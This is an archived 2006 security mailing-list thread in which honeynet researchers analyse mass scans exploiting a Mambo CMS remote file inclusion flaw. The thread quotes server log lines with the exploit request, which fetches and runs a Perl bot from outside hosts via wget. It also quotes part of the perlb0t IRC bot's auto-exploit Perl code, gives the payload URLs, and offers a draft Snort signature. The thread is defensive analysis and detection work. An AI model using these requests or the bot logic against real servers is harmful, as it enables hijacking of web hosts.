|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: High volume of Mambo scans (perlb0t)
From: Daniel Cid (danielcid
yahoo.com.br)
Date: Mon May 15 2006 - 08:54:47 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
I was looking at the scripts they try to download and
it does not looks like a common perl bot (connecting
to irc). It's also written in php and by a brazilian
person (comments in portuguese) and with a terrible
code :) I didn't have time to fully look at it,
though.
These are the pages they access:
http://usuarios.lycos.es/athos666/d25/
http://usuarios.lycos.es/athos666/d25/therules25.dat
http://radius01.comete.ci/tool.gif
I'm attaching them just in case they remove
these pages (please be aware that they are
scripts, not gifs :)).
Thanks,
--
Daniel B. Cid
dcid ( at ) ossec.net
--- Jamie Riden <jamesreurope.com> escreveu:
> Seems to have some kind of google search code for
> the particular
> vulnerability - haven't seen this before:
>
> if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {^M
> sendraw($IRC_cur_socket, "PRIVMSG
> $printl
> :\002[GOOGLE]\002 Scanning for unpatched mambo for
> ".$1."
> seconds.");^M
> srand;^M
> my $itime = time;^M
> my ($cur_time);^M
> my ($exploited);^M
> $boturl=$2;^M
> $cur_time = time - $itime;$exploited =
> 0;^M
> while($1>$cur_time){^M
> $cur_time = time - $itime;^M
> urls=fetch();^M
> foreach $url (urls) {^M
> sendraw($IRC_cur_socket,
> "PRIVMSG $printl
> :\002[GOOGLE]\002 Trying to exploit ".$url);^M
> $cur_time = time - $itime;^M
> my $path = "";my $file =
> "";($path, $file) =
> $url =~ /^(.+)\/(.+)$/;^M
> $url
>
=$path."/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=$boturl?";^M
> $page = http_query($url);^M
> $exploited = $exploited +
> 1;^M
> }^M
> }^M
> sendraw($IRC_cur_socket, "PRIVMSG
> $printl
> :\002[GOOGLE]\002 Exploited ".$exploited." boxes in
> ".$1."
> seconds.");^M
>
> This is a quick stab at a snort sig:
>
> alert tcp $EXTERNAL_NET !21:443 -> $HOME_NET !80
> (msg: "BLEEDING-EDGE
> perlb0t Bot Reporting Scan/Exploit"; flow:
> to_server,established;
> content:"PRIVMSG|20|"; nocase; within: 80; tag:
> session, 20, packets;
> pcre:"/(GOOGLE|HTTP|TCP|SCAN|UDP|VERSION)/i";
> within:16;
>
pcre:"/(Exploiting|Exploited}Attacking|Scanning|perlb0t)/i";
> classtype: trojan-activity; sid: xxxx; rev:1; )
>
> but I'm sure this could be improved.
>
> cheers,
> Jamie
>
> On 15/05/06, Jamie Riden <jamesreurope.com> wrote:
> > Looks like some sort of shellbot wanting to
> connect to an IRC channel
> > #abusers on abuser.hacked.in:8080.
> >
> > I've been seeing occaisonal probes for Mambo's
> index.php on and off
> > for a while now - the first part is similar to
> >
>
http://nz-honeynet.org/papers/mambo-exploit-obfuscated.pdf
> but the
> > payloads are slightly different, though it always
> seems to end up with
> > an IRC bot of some kind.
> >
> > I usually see them coupled with scans for
> coppermine and other remote
> > include issues, plus xmlrpc probes.
> >
> > I think you're seeing an attempt to exploit
> issue#3 here -
> > http://secunia.com/advisories/18935/
> >
> > cheers,
> > Jamie
> >
> > On 14/05/06, Daniel Cid <danielcidyahoo.com.br>
> wrote:
> > > Since Thursday night I'm seeing a high volume of
> scans
> > > on different web servers for possibly the
> following
> > > vulns:
> > >
> > > http://secunia.com/advisories/14337/
> > >
> http://www.osvdb.org/displayvuln.php?osvdb_id=10180
> > >
> > >
> > > However, they say the problem is on function.php
> and
> > > I'm seeing them on index.php. Can anyone confirm
> that?
> > >
> > > Some log samples:
> > >
> > > 200.80.39.39 - - [12/May/2006:15:27:28 -0300]
> "GET
> > >
>
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 217.160.131.47 - - [12/May/2006:15:34:30 -0300]
> "GET
> > >
>
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 58.26.138.159 - - [12/May/2006:16:03:47 -0300]
> "GET
> > >
>
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 200.80.39.39 - - [12/May/2006:16:27:28 -0300]
> "GET
> > >
>
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 217.160.131.47 - - [12/May/2006:16:29:30 -0300]
> "GET
> > >
>
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 58.26.138.159 - - [12/May/2006:16:36:47 -0300]
> "GET
> > >
>
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 212.87.13.140 - - [12/May/2006:16:50:02 -0300]
> "GET
> > >
>
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*?
> > > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> >
> > --
> > Jamie Riden / jamesreurope.com /
> jamie.ridencomputer.org
> > NZ Honeynet project - http://www.nz-honeynet.org/
> >
>
>
> --
> Jamie Riden / jamesreurope.com /
> jamie.ridencomputer.org
> NZ Honeynet project - http://www.nz-honeynet.org/
>
_______________________________________________________
Navegue com o Yahoo! Acesso Grátis, assista aos jogos do Brasil na Copa e ganhe prêmios de hora em hora!
http://br.yahoo.com/artilheirodacopa/
- video/mpeg attachment: 1269156576-therules25.dat
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]